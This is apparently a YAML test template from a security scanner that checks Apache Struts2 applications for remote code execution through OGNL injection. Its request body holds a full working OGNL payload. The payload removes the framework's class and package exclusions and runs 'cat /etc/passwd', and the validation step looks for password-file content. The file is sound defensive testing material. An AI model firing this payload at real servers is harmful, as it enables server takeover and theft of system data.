---
id: FRAMEWORK_RCE_STRUTS2
info:
  name: "Framework RCE - Apache Struts2"
  description: "Tests whether Apache Struts2 applications are vulnerable to Remote Code Execution through OGNL injection."
  details: "This test injects OGNL expression payloads into multipart form data to check if the application executes them, indicating a Remote Code Execution vulnerability."
  impact: "Remote Code Execution vulnerabilities allow attackers to execute arbitrary code on the server, potentially leading to complete system compromise, unauthorized access to sensitive data, and lateral movement within the network."
  category:
    name: COMMAND_INJECTION
    shortName: Command Injection
    displayName: Command Injection
  subCategory: FRAMEWORK_RCE_STRUTS2
  severity: CRITICAL
  tags:
    - Business logic
    - OWASP top 10
    - HackerOne top 10
  references:
    - "https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Command_Injection"
  cwe:
    - CWE-78
    - CWE-77
    - CWE-94

attributes:
  nature: INTRUSIVE
  plan: PRO
  duration: FAST

api_selection_filters:
  method:
    neq: "OPTIONS"
  response_code:
    gte: 200
    lt: 300
  response_payload:
    length:
      gt: 0

execute:
  type: single
  requests:
    - req:
        - modify_url: "/"
        - modify_method: POST
        - replace_body: '------WebKitFormBoundaryl7d1B1aGsV2wcZwF Content-Disposition: form-data; name="id"

            %{ (#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) + (#request.map.setBean(#request.get("struts.valueStack")) == true).toString().substring(0,0) + (#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) + (#request.map2.setBean(#request.get("map").get("context")) == true).toString().substring(0,0) + (#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) + (#request.map3.setBean(#request.get("map2").get("memberAccess")) == true).toString().substring(0,0) + (#request.get("map3").put("excludedPackageNames",#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) + (#request.get("map3").put("excludedClasses",#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) + (#application.get("org.apache.tomcat.InstanceManager").newInstance("freemarker.template.utility.Execute").exec({"cat /etc/passwd"})) }

            ------WebKitFormBoundaryl7d1B1aGsV2wcZwF'
        - modify_header:
            content-type: "multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF"
        - modify_header:
            content-length: 1095

validate:
  response_code:
    eq: 200
  response_payload:
    length:
      gt: 0
    regex: "root:.*:0:0:"
    not_contains:
      - <html>
      - </html>
